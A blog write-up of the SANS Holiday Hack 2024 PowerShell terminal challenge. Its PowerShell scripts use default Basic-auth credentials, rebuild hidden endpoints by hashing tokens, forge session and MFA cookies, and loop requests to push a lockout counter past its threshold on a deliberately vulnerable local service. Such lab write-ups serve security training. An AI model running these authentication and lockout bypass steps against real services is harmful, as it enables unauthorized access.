Sunday, November 24, 2024

SANS: Holiday Hack 2024: Act 2: Powershell Terminal

Powershell

Silver wasn't too bad.  I thought question 9 had a bug because it wasn't advancing forward.  Be careful and read the prompts. 

Silver

The goal is to write powershell to answer the questions given at the top of the Terminal.  Most native commands weren't permitted however, I snuck by a netstat -tulpn in there. :)

Here's a scripted way to solve it.  The sleeps are in there because there's a script on there that has to read through the output before it will change the question at the top of the Terminal.  The sleeps give it long enough to read the terminal.

Get-Content welcome.txt

Start-Sleep -Seconds 1

Get-Content welcome.txt | Measure-Object -Word

Start-Sleep -Seconds 1

netstat -tulpn

Start-Sleep -Seconds 1

invoke-webrequest 127.0.0.1:1225

Start-Sleep -Seconds 1

invoke-webrequest 127.0.0.1:1225 -Headers @{Authorization="Basic YWRtaW46YWRtaW4="}

Start-Sleep -Seconds 1

for($i=0; $i -le 50; $i++){try{$response=Invoke-WebRequest http://localhost:1225/endpoints/$i; if(($response.Content | Measure-Object -Word | Select -Expand Words) -eq 138){(Invoke-WebRequest http://localhost:1225/endpoints/$i).Content}}catch{}}

Start-Sleep -Seconds 1

Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/token_overview.csv

Start-Sleep -Seconds 1

Invoke-WebRequest http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C -Headers @{Authorization="Basic YWRtaW46YWRtaW4="}

Start-Sleep -Seconds 1

$session = [Microsoft.PowerShell.Commands.WebRequestSession]::new(); $cookie = [System.Net.Cookie]::new('token','5f8dd236f862f4507835b0e418907ffc','/','127.0.0.1'); $session.Cookies.Add($cookie)

Start-Sleep -Seconds 1

$response=Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C  -WebSession $session

Start-Sleep -Seconds 1

$cookie = [System.Net.Cookie]::new('mfa_token',$response.h1.a.href,'/','127.0.0.1'); $session.Cookies.Add($cookie)

Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/mfa_validate/4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C  -WebSession $session

Start-Sleep -Seconds 1

$encodedstring = "Q29ycmVjdCBUb2tlbiBzdXBwbGllZCwgeW91IGFyZSBncmFudGVkIGFjY2VzcyB0byB0aGUgc25vdyBjYW5ub24gdGVybWluYWwuIEhlcmUgaXMgeW91ciBwZXJzb25hbCBwYXNzd29yZCBmb3IgYWNjZXNzOiBTbm93TGVvcGFyZDJSZWFkeUZvckFjdGlvbg=="

Start-Sleep -Seconds 1

[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($encodedString))

Gold

The goal is to get around the defense mechanisms described in welcome.txt in the Silver part of the challenge.  The silver kind of gives you an idea of how it works.  You have to request a token at the tokens api for a specific endpoint, then that endpoint gives you a token to submit to mfa_validate for that endpoint.  Once those tokens are submitted, the machine goes into lockdown because for some reason it deems the player as suspicious.  In the hints it reiterates what you should've learned in the Powershell Terminal.

Hints in Badge:

"I overheard some of the other elves talking.  Even though the endpoints have been redacted, they are still operational.  This means that you can probably elevate your access by communicating with them.  I suggest working out the hashing scheme to reproduce the redacted endpoints.  Luckily one of them is still active and can be tested against.  Try hashing the token with SHA256 and see if you can reliably reproduce the endpoint.  This might help, pipe the tokens to Get-FileHash -Algorithm SHA256."

"They also mentioned this lazy elf who programmed the security settings in the weapons terminal. He created a fakeout protocol that he dubbed Elf Detection and Response "EDR". The whole system is literally that you set a threshold and after that many attempts, the response is passed through... I can't believe it. He supposedly implemented it wrong so the threshold cookie is highly likely shared between endpoints!"

Each of the md5 tokens given in http://127.0.0.1:1225/token_overview.csv represents a token that must be presented for each of the specific endpoints.  The md5 tokens can be sent through the SHA256 hashing algorithm to get the possible endpoints.  When this endpoint is locked down, you have to find the "scrambled" endpoint.  That basically just consists of looping through them until you find the correct one.

The hints gave a clue where to start.  I tried to use the 4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C endpoint and the 5f8dd236f862f4507835b0e418907ffc token to see if using something like Get-FileHash -Algorithm SHA256 5f8dd236f862f4507835b0e418907ffc could be used to reliably create this hash: 4216B4FAF4391EE4D3E0EC53A372B2F24876ED5D124FE08E227F84D687A7E06C.  Unfortunately, I wasn't able to do that because Get-FileHash accepts a file as input and outputs that file's hash.  There is an -InputStream parameter, however, it wasn't giving a hash that matched.  I'm probably missing something.

$stringAsStream = [System.IO.MemoryStream]::new()
$writer = [System.IO.StreamWriter]::new($stringAsStream)
$writer.write("5f8dd236f862f4507835b0e418907ffc")
$writer.Flush()
$stringAsStream.Position = 0
Get-FileHash -InputStream $stringAsStream | Select-Object Hash

7FA1DAD4145BC91C5354C72E540A2903E7933958914A15244E1D5AF4BA005172

So, instead of trying to figure that out, I took the md5 hashes representing the tokens out to Linux and got the SHA256 hashes via sha256sum.  Bash is so much easier at times.  There weren't many of them, so I simply displayed them, copied them with Ctrl-C and pasted them into my Linux VM into a file called tokens.txt.

while read p; do echo "$p" | sha256sum ; done < tokens.txt

After that, I copied those sha256 hashes, saved them into Notepad++ and manipulated them to get "" around each hash and a comma separating each of them.  There are more efficient ways of doing things, but this worked.

Then I created a couple array variables: $tokens and $endpoints.

To create a $tokens array in the Powershell Terminal:

Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/token_overview.csv -OutFile token_overview.csv

Import-CSV token_overview.csv | GM

$tokens = $(Import-CSV token_overview.csv | Select -ExpandProperty 'file_MD5hash' | Select -First 49)

#To create a variable holding one of the values from the array:

$token = $tokens[1].trim()

$endpoints = @("DFD05F3B46D21BC8556CDBF544325A945ED0304EC0BB7DBFD68ED5931E7FF6EE","1F3C45D7E7B1F7621F67136C538C6933791D3392648C7B0F8B17FB1A6343EBD5","E2DBBDBCC7E57E526841899975B6621105710E76C203C1DC30419E7F1CBA5297","BC83A2C7A6279EAD36370AB3509FEA7483EFF83C164FC7CFE3C680D879B9F9D2","B93772D2393029424049564B366F08B21E66282CE3D7B9DA4F7A69C8891012A0","989FDE082FB901AE5EDFD873BF41A76BF47B318F76968D0275DAD99ABD5894B4","E2B80B2C70BA5982814B758849472C8711AF8051E5261CE827C02818D7E1DE8C","704FECC829A3ACB5E50E3277EAFC03CA902E515CFD81BFA94670A44ACA551D6A","F5251B4CA89F3C4EB6BBCF40AD41ABC870FFB8BFC4D1E170DF7ED88F23E20568","A9FBA920D17E1B98F393E691EC837A0CA41BE8115389F2A634F77DCEEAF20725","AF2B19CC9CEE8005C95A321605FB2AAB8577C66EBD762CC2DF943FEE47987D86","0F8B6BD4B5D006BD7A0FCEEBA10A7726430EA9AF7FA4314C0A83E17ACAEA32B6","38810A7BEA5587438CBFA6A0C364619CA4F886EC403BE951CF38F5158D7DA4F9","A93F039A2D5158251D509AFB2BF6BC45DEC47D8AC189A170A23CAEA07F009476","89298B15BECC2F6C98C53EBFEBF1C91D7D569CB0895B22F840BD3B9CA400E9F7","F6BC096E3570C6622EA951B3CFB852E116D0E1460576FB9FBE6F6B75DCCB46C7","3877CD419E2D8907C09DE27C68BABFBCD88A9D8F7BEBDB4385AFF288D0A39631","1E257FCA2443492C6B8621BEE3117E9DE40D6D6E1A7CA4861079FB74CB9DC164","AC7458460E359B3B940540168AFFC7FA354C3CC05A52A52A1A6DE0538AE60EC8","65D70BADAC127DAC0BCC4962107B708A37CF24B8DCD327C328A3C59A610F18EE","E2692776B6ECD2C39373CED96F7FF8B64AEAE56404352CF06AEFC724CC4C7CF1","E433FEB9DE55166463E0BD4BA14A3CC099BD1BA1ABF20FD290491BDA3D3CF2E6","CF056AE6605F7909A7E6126716E528B863807D2DC153A4D5AA00714AC72AADC4","F732A928CDA0C4A51284F8B28401EAC228CA2769804CFBCC16F2C8A0C58713F2","D2E0F89C295194775B9835F646F5BDD950EB05CB6D912602CE4FF62A30EBE437","7A50D248E3991BF55C361E119FAA292C8661F0EB6476C868DB3289793391E12F","BC9F1A7214052F7AD3FB5076A1862E24DC71808BA27C5D9C584D681F6C3AFE6B","5BBE0D45C6A1FD01A7641FF4807009EFC91FD7F5637DDED8B71AD8E2ADA5D086","8FCFF56C3C425A8A7163493B1F17FB330AD89FBBEFDDD9C5D226196C4C327BBB","F892F608096E56013C3ED96E4F984C6376617C42E328E20382660370FF181CE4","D040356E54CA166CD0479D9878FC9BA1012A80419A846A58A24649F4F01B63F8","FF1A98E7BB3D9F87C4495EE7D62C455CBAD6C6A6AD4ABBA25A503B7C1AE113C1","6297F422314EA9E9172752F3A891BD505752C5F14FCAB93153BCB1038FB5AB87","04519F7AF02A977A27A8D9398E86354117537FA896C437019A61F46D31BFD339","5A4B06401AD22FA4CF75FE22829CB14549C4F18A18C67BEB16D314B80A4F44D9","ABF98108DBD1095A59BAE36726FAC48E3AB23DA2CF2EFFEAE02EF5C142CB76FE","2DDA00DA692764113B97787241658A1911AEB4C0BD9B92E4FAB4FFCB1FE15A33","CE92890075A6232A039BCB06B83ADF90355119A99DA8D694C85681E310191BB9","AE311EBE101C6AC4E11E4E338906ECEDC22583FAD68B85834EED3CB684FC4383","ACAB8D777A0C5F9D631B4FE6E07CC14B7E063C1E48EE8A0AB876D12082AD3FEA","01B1F4132E95B847D89FCDC599FD685E26198AA684196663C4C0B51B1A410DC4","368EF0EB3BD563C81F658E6C47182524256F09212010774B00939A440DABD9F6","B3395DC1F995F897F36E5AB99B7A3EADA186713CC40785BB33F06C4D7C989673","9992B3B85730EA436A546086036520BCF15D86B1A2A8F96E4D3C569148F770D3","35138166CED99D6A600B52F70C818CF44826170FD88B8234107EC0BD51CC276D","15D6E335C167DEA490AC4CD91815C56D7ECEF3CD4B019588567710D839A9EA45","2AE009872B65D788E44F634736689AF1570333FD802B93B41DF09A3F7D02C0E1","BAC2F3580B6491CBF26C84F5DCF343D3F48557833C79CF3EFB09F04BE0E31B60")

Another way to create the tokens array - manipulate them until they each have quotes around them, and commas in between them.

$tokens = @("04886164e5140175bafe599b7f1cacc8","664f52463ef97bcd1729d6de1028e41e","3e03cd0f3d335c6fb50122553f63ef78","f2aeb18f5b3f08420eed9b548b6058c3","32b9401a6d972f8c1a98de145629ea9d","3a79238df0a92ab0afa44a85f914fc3b","49c2a68b21b9982aa9fd64cf0fd79f72","f8142c1304efb9b7e9a7f57363c2d286","706457f6dd78729a8bed5bae1efaeb50","bb0564aa5785045937a35a9fa3fbbc73","4173a7bc22aee35c5fc48261b041d064","198b8bf2cd30a7c7fed464cca1720a88","3a7c8ecffeeadb164c31559f8f24a1e7","288e60e318d9ad7d70d743a614442ffc","87ab4cb29649807fdb716ac85cf560ea","89f3ec1275407c9526a645602d56e799","33539252b40b5c244b09aee8a57adbc9","152899789a191d9e9150a1e3a5513b7f","7cd48566f118a02f300cdfa75dee7863","d798a55fca64118cea2df3c120f67569","6ef5570cd43a3ec9f43c57f662201e55","bf189d47c3175ada98af398669e3cac3","743ac25389a0b430dd9f8e72b2ec9d7f","270aabd5feaaf40185f2effa9fa2cd6e","8b58850ee66bd2ab7dd2f5f850c855f8","6fd00cbda10079b1d55283a88680d075","612001dd92369a7750c763963bc327f0","010f2cc580f74521c86215b7374eead6","29860c67296d808bc6506175a8cbb422","7b7f6891b6b6ab46fe2e85651db8205f","45ffb41c4e458d08a8b08beeec2b4652","d0e6bfb6a4e6531a0c71225f0a3d908d","bd7efda0cb3c6d15dd896755003c635c","5be8911ced448dbb6f0bd5a24cc36935","1acbfea6a2dad66eb074b17459f8c5b6","0f262d0003bd696550744fd43cd5b520","8cac896f624576d825564bb30c7250eb","8ef6d2e12a58d7ec521a56f25e624b80","b4959370a4c484c10a1ecc53b1b56a7d","38bdd7748a70529e9beb04b95c09195d","8d4366f08c013f5c0c587b8508b48b15","67566692ca644ddf9c1344415972fba8","8fbf4152f89b7e309e89b9f7080c7230","936f4db24a290032c954073b3913f444","c44d8d6b03dcd4b6bf7cb53db4afdca6","cb722d0b55805cd6feffc22a9f68177d","724d494386f8ef9141da991926b14f9b","67c7aef0d5d3e97ad2488babd2f4c749")

After that it's a matter of trial and error - paying careful attention to output.

Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225 -WebSession $session

I did this so the session variable was created.  For some reason, just making the variable like this:

$session = [Microsoft.PowerShell.Commands.WebRequestSession]::new(); $cookie = [System.Net.Cookie]::new('token',$token,'/','127.0.0.1'); $session.Cookies.Add($cookie)

Didn't work until I already sent a request using that variable as the session - maybe bug?  I don't know.

I started off with one endpoint to see what output I get.  Remember that each endpoint is associated with a certain token.  So, I had to use the token that corresponds with the specific endpoint I'm trying to access.

$token = $tokens[1] #664f52463ef97bcd1729d6de1028e41e
$endpoint = $endpoints[1] #1F3C45D7E7B1F7621F67136C538C6933791D3392648C7B0F8B17FB1A6343EBD5

We already know this part from the Silver part of the challenge.  Now I have to create a session and add the token cookie to that session.

$session = [Microsoft.PowerShell.Commands.WebRequestSession]::new(); $cookie = [System.Net.Cookie]::new('token',$token,'/','127.0.0.1'); $session.Cookies.Add($cookie)

This next command uses the session that was created and the cookies attached to it to reach out to that endpoint.

$response = Invoke-WebRequest -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session

I put the response from the request to the server in a variable so I can see the output.  Sometimes Powershell interprets things as strings instead of objects, or certain objects get cut off if you just view it.  Having it in a variable means that I can access objects to see what was cut off.

Example:

This was output without the response variable.

StatusCode        : 200
StatusDescription : OK
Content           : <h1>Canary TRIPWIRE</h1>
                    <p>Possible unauthorized access detected.<br>Endpoints have been scrambled.<br>Basic token evasion tactics implemented, fakeout threshold set to 10.<br>Default token validity …
RawContent        : HTTP/1.1 200 OK
                    Server: Werkzeug/3.0.6
                    Server: Python/3.10.12
                    Date: Sat, 23 Nov 2024 05:48:52 GMT
                    Connection: close
                    Content-Type: text/html; charset=utf-8
                    Content-Length: 372
                    
                    <h1>Canary TRIPWIRE</h1>…
Headers           : {[Server, System.String[]], [Date, System.String[]], [Connection, System.String[]], [Content-Type, System.String[]]…}
Images            : {}
InputFields       : {}
Links             : {@{outerHTML=<a href='1732340932.4352405'>/mfa_validate/1F3C45D7E7B1F7621F67136C538C6933791D3392648C7B0F8B17FB1A6343EBD5</a>; tagName=A; href=1732340932.4352405}}
RawContentLength  : 372
RelationLink      : {}

If I didn't have it in a variable, and I got further along and wanted to go back and look, I'd have to run the command again to see the output.  Also, I'm not familiar with everything Web related in Powershell.  If I knew them offhand, I could do something like 

Invoke-WebRequest -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session) | Select -ExpandProperty RawContent 

to see them at the time, but saving to variables can be handy to look at later.

There's another error that is output from running that last command.
This error says an mfa_token must be set.  Again, we knew this would be an issue from silver.  Referencing the value for the cookie is different for this one.  Notice I'm accessing the response object, splitting it at the apostrophe, and taking the second object which is the token this time.  Notice I'm switching between Invoke-WebRequest and Invoke-RestMethod based on the objects that are created and which one either outputs more or less.

$response = Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session) | Select -ExpandProperty RawContent 

$cookie2 = [System.Net.Cookie]::new('mfa_token',$response.split("'")[1],'/','127.0.0.1'); $session.Cookies.Add($cookie2)

You have to be quick so the whole set of commands needs to be ran immediately, otherwise you get a token expired error.

$response = Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session

$cookie2 = [System.Net.Cookie]::new('mfa_token',$response.split("'")[1],'/','127.0.0.1'); $session.Cookies.Add($cookie2)

$response2=Invoke-WebRequest -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/mfa_validate/$endpoint  -WebSession $session

After this, we get an error saying Setting Attempts.  This error is a clue something else is going on.  When this error message is displayed a cookie is created called attempts.  It is the counter for the lockout threshold.  It has a value like attempts=c25ha2VvaWwK01.  Each time you attempt to access that same endpoint, that value is incremented up by 1 all the way to attempts=c25ha2VvaWwK10.  The first part base64 decodes to snakeoil.  The last part is the number of attempts.

After that, simply visit that same endpoint until the attempts cookie gets to attempts=c25ha2VvaWwK10.  This can be done by creating a loop in Powershell that runs the 3 commands above 10 times.

$token = $tokens[1]
$endpoint = $endpoints[1]

$session = [Microsoft.PowerShell.Commands.WebRequestSession]::new(); $cookie = [System.Net.Cookie]::new('token',$token,'/','127.0.0.1'); $session.Cookies.Add($cookie)

#remember this is counting from 0-9 inclusive meaning 10 times.
for($h=0;$h -le 9; $h++){

$response = Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session

$cookie2 = [System.Net.Cookie]::new('mfa_token',$response.split("'")[1],'/','127.0.0.1'); $session.Cookies.Add($cookie2)

Invoke-WebRequest -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/mfa_validate/$endpoint  -WebSession $session
}

After that, change the token and endpoint to the next endpoint and its corresponding token.  The session needs to stay the same so don't change that.

$token = $tokens[2]
$endpoint = $endpoints[2]
#The cookie for the token has to be updated with the new token.
$cookie = [System.Net.Cookie]::new('token',$token,'/','127.0.0.1'); $session.Cookies.Add($cookie)

Then run the 3 commands above again.  You don't have to run it 10 times for each endpoint after the first one because the attempts cookie is already set and stays set so long as you aren't logged out or make a mistake resetting the counter.  The token cookie will need to be changed each time you change the token and the endpoint.

Keep trying those three commands on the different endpoints until you get a success message.
If you mess up, the count starts over again for attempts, so you have to start back from the top.

for ($i =2; $i -le 47; $i++){
$token = $tokens[$i]
$endpoint = $endpoints[$i]
#The cookie for the token has to be updated with the new token.
$cookie = [System.Net.Cookie]::new('token',$token,'/','127.0.0.1'); $session.Cookies.Add($cookie)

$response = Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session

$cookie2 = [System.Net.Cookie]::new('mfa_token',$response.split("'")[1],'/','127.0.0.1'); $session.Cookies.Add($cookie2)

Invoke-WebRequest -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/mfa_validate/$endpoint  -WebSession $session
#This was so I could watch the reponses.
Start-Sleep -Seconds 1
}

The success message will go by pretty fast.  Next, we only want to see the response if it's a success and break out of the loop.  The following is the full script.

$endpoints = @("DFD05F3B46D21BC8556CDBF544325A945ED0304EC0BB7DBFD68ED5931E7FF6EE","1F3C45D7E7B1F7621F67136C538C6933791D3392648C7B0F8B17FB1A6343EBD5","E2DBBDBCC7E57E526841899975B6621105710E76C203C1DC30419E7F1CBA5297","BC83A2C7A6279EAD36370AB3509FEA7483EFF83C164FC7CFE3C680D879B9F9D2","B93772D2393029424049564B366F08B21E66282CE3D7B9DA4F7A69C8891012A0","989FDE082FB901AE5EDFD873BF41A76BF47B318F76968D0275DAD99ABD5894B4","E2B80B2C70BA5982814B758849472C8711AF8051E5261CE827C02818D7E1DE8C","704FECC829A3ACB5E50E3277EAFC03CA902E515CFD81BFA94670A44ACA551D6A","F5251B4CA89F3C4EB6BBCF40AD41ABC870FFB8BFC4D1E170DF7ED88F23E20568","A9FBA920D17E1B98F393E691EC837A0CA41BE8115389F2A634F77DCEEAF20725","AF2B19CC9CEE8005C95A321605FB2AAB8577C66EBD762CC2DF943FEE47987D86","0F8B6BD4B5D006BD7A0FCEEBA10A7726430EA9AF7FA4314C0A83E17ACAEA32B6","38810A7BEA5587438CBFA6A0C364619CA4F886EC403BE951CF38F5158D7DA4F9","A93F039A2D5158251D509AFB2BF6BC45DEC47D8AC189A170A23CAEA07F009476","89298B15BECC2F6C98C53EBFEBF1C91D7D569CB0895B22F840BD3B9CA400E9F7","F6BC096E3570C6622EA951B3CFB852E116D0E1460576FB9FBE6F6B75DCCB46C7","3877CD419E2D8907C09DE27C68BABFBCD88A9D8F7BEBDB4385AFF288D0A39631","1E257FCA2443492C6B8621BEE3117E9DE40D6D6E1A7CA4861079FB74CB9DC164","AC7458460E359B3B940540168AFFC7FA354C3CC05A52A52A1A6DE0538AE60EC8","65D70BADAC127DAC0BCC4962107B708A37CF24B8DCD327C328A3C59A610F18EE","E2692776B6ECD2C39373CED96F7FF8B64AEAE56404352CF06AEFC724CC4C7CF1","E433FEB9DE55166463E0BD4BA14A3CC099BD1BA1ABF20FD290491BDA3D3CF2E6","CF056AE6605F7909A7E6126716E528B863807D2DC153A4D5AA00714AC72AADC4","F732A928CDA0C4A51284F8B28401EAC228CA2769804CFBCC16F2C8A0C58713F2","D2E0F89C295194775B9835F646F5BDD950EB05CB6D912602CE4FF62A30EBE437","7A50D248E3991BF55C361E119FAA292C8661F0EB6476C868DB3289793391E12F","BC9F1A7214052F7AD3FB5076A1862E24DC71808BA27C5D9C584D681F6C3AFE6B","5BBE0D45C6A1FD01A7641FF4807009EFC91FD7F5637DDED8B71AD8E2ADA5D086","8FCFF56C3C425A8A7163493B1F17FB330AD89FBBEFDDD9C5D226196C4C327BBB","F892F608096E56013C3ED96E4F984C6376617C42E328E20382660370FF181CE4","D040356E54CA166CD0479D9878FC9BA1012A80419A846A58A24649F4F01B63F8","FF1A98E7BB3D9F87C4495EE7D62C455CBAD6C6A6AD4ABBA25A503B7C1AE113C1","6297F422314EA9E9172752F3A891BD505752C5F14FCAB93153BCB1038FB5AB87","04519F7AF02A977A27A8D9398E86354117537FA896C437019A61F46D31BFD339","5A4B06401AD22FA4CF75FE22829CB14549C4F18A18C67BEB16D314B80A4F44D9","ABF98108DBD1095A59BAE36726FAC48E3AB23DA2CF2EFFEAE02EF5C142CB76FE","2DDA00DA692764113B97787241658A1911AEB4C0BD9B92E4FAB4FFCB1FE15A33","CE92890075A6232A039BCB06B83ADF90355119A99DA8D694C85681E310191BB9","AE311EBE101C6AC4E11E4E338906ECEDC22583FAD68B85834EED3CB684FC4383","ACAB8D777A0C5F9D631B4FE6E07CC14B7E063C1E48EE8A0AB876D12082AD3FEA","01B1F4132E95B847D89FCDC599FD685E26198AA684196663C4C0B51B1A410DC4","368EF0EB3BD563C81F658E6C47182524256F09212010774B00939A440DABD9F6","B3395DC1F995F897F36E5AB99B7A3EADA186713CC40785BB33F06C4D7C989673","9992B3B85730EA436A546086036520BCF15D86B1A2A8F96E4D3C569148F770D3","35138166CED99D6A600B52F70C818CF44826170FD88B8234107EC0BD51CC276D","15D6E335C167DEA490AC4CD91815C56D7ECEF3CD4B019588567710D839A9EA45","2AE009872B65D788E44F634736689AF1570333FD802B93B41DF09A3F7D02C0E1","BAC2F3580B6491CBF26C84F5DCF343D3F48557833C79CF3EFB09F04BE0E31B60")

$tokens = @("04886164e5140175bafe599b7f1cacc8","664f52463ef97bcd1729d6de1028e41e","3e03cd0f3d335c6fb50122553f63ef78","f2aeb18f5b3f08420eed9b548b6058c3","32b9401a6d972f8c1a98de145629ea9d","3a79238df0a92ab0afa44a85f914fc3b","49c2a68b21b9982aa9fd64cf0fd79f72","f8142c1304efb9b7e9a7f57363c2d286","706457f6dd78729a8bed5bae1efaeb50","bb0564aa5785045937a35a9fa3fbbc73","4173a7bc22aee35c5fc48261b041d064","198b8bf2cd30a7c7fed464cca1720a88","3a7c8ecffeeadb164c31559f8f24a1e7","288e60e318d9ad7d70d743a614442ffc","87ab4cb29649807fdb716ac85cf560ea","89f3ec1275407c9526a645602d56e799","33539252b40b5c244b09aee8a57adbc9","152899789a191d9e9150a1e3a5513b7f","7cd48566f118a02f300cdfa75dee7863","d798a55fca64118cea2df3c120f67569","6ef5570cd43a3ec9f43c57f662201e55","bf189d47c3175ada98af398669e3cac3","743ac25389a0b430dd9f8e72b2ec9d7f","270aabd5feaaf40185f2effa9fa2cd6e","8b58850ee66bd2ab7dd2f5f850c855f8","6fd00cbda10079b1d55283a88680d075","612001dd92369a7750c763963bc327f0","010f2cc580f74521c86215b7374eead6","29860c67296d808bc6506175a8cbb422","7b7f6891b6b6ab46fe2e85651db8205f","45ffb41c4e458d08a8b08beeec2b4652","d0e6bfb6a4e6531a0c71225f0a3d908d","bd7efda0cb3c6d15dd896755003c635c","5be8911ced448dbb6f0bd5a24cc36935","1acbfea6a2dad66eb074b17459f8c5b6","0f262d0003bd696550744fd43cd5b520","8cac896f624576d825564bb30c7250eb","8ef6d2e12a58d7ec521a56f25e624b80","b4959370a4c484c10a1ecc53b1b56a7d","38bdd7748a70529e9beb04b95c09195d","8d4366f08c013f5c0c587b8508b48b15","67566692ca644ddf9c1344415972fba8","8fbf4152f89b7e309e89b9f7080c7230","936f4db24a290032c954073b3913f444","c44d8d6b03dcd4b6bf7cb53db4afdca6","cb722d0b55805cd6feffc22a9f68177d","724d494386f8ef9141da991926b14f9b","67c7aef0d5d3e97ad2488babd2f4c749")

$token = $tokens[0]
$endpoint = $endpoints[0]

Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225 -WebSession $session

$session = [Microsoft.PowerShell.Commands.WebRequestSession]::new(); $cookie = [System.Net.Cookie]::new('token',$token,'/','127.0.0.1'); $session.Cookies.Add($cookie)

#remember this is counting from 0-9 inclusive meaning 10 times.
for($h=0;$h -le 9; $h++){

$response = Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session

$cookie2 = [System.Net.Cookie]::new('mfa_token',$response.split("'")[1],'/','127.0.0.1'); $session.Cookies.Add($cookie2)

Invoke-WebRequest -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/mfa_validate/$endpoint  -WebSession $session
}

for ($i =1; $i -le 47; $i++){
$token = $tokens[$i]
$endpoint = $endpoints[$i]

$cookie = [System.Net.Cookie]::new('token',$token,'/','127.0.0.1'); $session.Cookies.Add($cookie)

$response = Invoke-RestMethod -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/tokens/$endpoint  -WebSession $session

$cookie2 = [System.Net.Cookie]::new('mfa_token',$response.split("'")[1],'/','127.0.0.1'); $session.Cookies.Add($cookie2)

$response2 = Invoke-WebRequest -Headers @{Authorization="Basic YWRtaW46YWRtaW4="} http://127.0.0.1:1225/mfa_validate/$endpoint  -WebSession $session

if ($response2.Content -match "Success"){
    $response2.RawContent
    break
}
}

No comments:

Post a Comment